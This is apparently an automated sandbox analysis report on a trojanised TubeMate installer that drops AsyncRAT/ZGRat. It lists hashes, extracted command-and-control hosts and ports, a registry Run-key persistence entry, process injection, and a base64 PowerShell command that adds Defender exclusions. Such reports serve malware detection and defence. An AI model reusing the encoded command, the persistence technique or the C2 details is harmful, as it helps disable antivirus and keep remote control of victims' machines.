Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
12-05-2024 09:01
Static task
static1
Behavioral task
behavioral1
Sample
3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe
Resource
win7-20240508-en
General
-
Target
3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe
-
Size
48.5MB
-
MD5
645793d9e9330d225a3b3dfd20e20064
-
SHA1
4344014c90b9a3ec79750998cdc5b68df983cd59
-
SHA256
3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0
-
SHA512
c8957f5fdf202f73e68d5e2397799f6f420b123df91743330e4d2495675c67e4d74a10e0030fb1c4d314dd1173a3b3c905db752f5d87600e8a8dcc18efb5297b
-
SSDEEP
1572864:Pwc6WzPrjxZFn1D0mNt1XhIEuX6LwkLXZwy:Z7BZd3f8uw
Malware Config
Extracted
asyncrat
0.5.8
Default
5512.sytes.net:6606
5512.sytes.net:7707
5512.sytes.net:8808
95.211.208.153:6606
95.211.208.153:7707
95.211.208.153:8808
Llg9a02PERRO
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 33 IoCs
resource yara_rule behavioral1/memory/2304-24-0x0000000004BC0000-0x0000000004DE0000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-26-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-35-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-87-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-85-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-83-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-81-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-79-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-77-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-76-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-73-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-71-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-70-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-67-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-65-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-63-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-61-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-59-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-57-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-55-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-53-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-51-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-49-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-47-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-45-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-43-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-41-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-39-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-37-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-33-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-31-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-29-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 behavioral1/memory/2304-27-0x0000000004BC0000-0x0000000004DDA000-memory.dmp family_zgrat_v1 -
Executes dropped EXE 3 IoCs
pid Process 2304 Dfzxuwcml.exe 2732 windows-tubemate-setup.exe 2704 windows-tubemate-setup.tmp -
Loads dropped DLL 3 IoCs
pid Process 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 2732 windows-tubemate-setup.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kpteiazy = "C:\\Users\\Admin\\AppData\\Roaming\\Kpteiazy.exe" Dfzxuwcml.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2304 set thread context of 3200 2304 Dfzxuwcml.exe 34 -
pid Process 3012 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3012 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2704 windows-tubemate-setup.tmp -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 2304 Dfzxuwcml.exe Token: SeDebugPrivilege 2304 Dfzxuwcml.exe Token: SeDebugPrivilege 3200 AppLaunch.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2920 wrote to memory of 3012 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 28 PID 2920 wrote to memory of 3012 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 28 PID 2920 wrote to memory of 3012 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 28 PID 2920 wrote to memory of 3012 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 28 PID 2920 wrote to memory of 2304 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 30 PID 2920 wrote to memory of 2304 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 30 PID 2920 wrote to memory of 2304 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 30 PID 2920 wrote to memory of 2304 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 30 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2920 wrote to memory of 2732 2920 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe 31 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2732 wrote to memory of 2704 2732 windows-tubemate-setup.exe 32 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34 PID 2304 wrote to memory of 3200 2304 Dfzxuwcml.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe"C:\Users\Admin\AppData\Local\Temp\3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbgBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAZABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeQByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdAB4ACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Users\Admin\AppData\Local\Dfzxuwcml.exe"C:\Users\Admin\AppData\Local\Dfzxuwcml.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
-
C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Users\Admin\AppData\Local\Temp\is-UBFL1.tmp\windows-tubemate-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UBFL1.tmp\windows-tubemate-setup.tmp" /SL5="$70122,48138664,121344,C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2704
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5577b8f4cd65df6e3cd42d7d37c7917cf
SHA15033814e5aade04682bf7cb7fca3e32c46c5512a
SHA256d4360ef0464f7620fe0e3d5185adcdc0781aacfe23510d2c6c2e85c1095c8948
SHA512a42dab76abe41e53d7eee1ff3cec3092b26e1a05bdd6c91e8f12e35f6f14fc36df5ef918d0a2818d9f549db1e8ace169ff8ed3f441253a9a27b89c1ec816ff9d
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
1.1MB
MD534acc2bdb45a9c436181426828c4cb49
SHA15adaa1ac822e6128b8d4b59a54d19901880452ae
SHA2569c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07
SHA512134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb
-
Filesize
46.3MB
MD591d80adacf5e1e6686c209315197e4d1
SHA1381a7ae480e94829d1173593af2eec981d47863a
SHA256edf5656d1d254315ebe90b6365ee72f422cf64248da8cf885a9aa9dade46b824
SHA5129624bf5188c675a25635f23dfe38c886e1cd2be5f69f7bec360ffe8d467c5ecff2836906fe1a129b96a3ea26c91b9fc6149002af5c9dd62c603cbe9f5d2e121a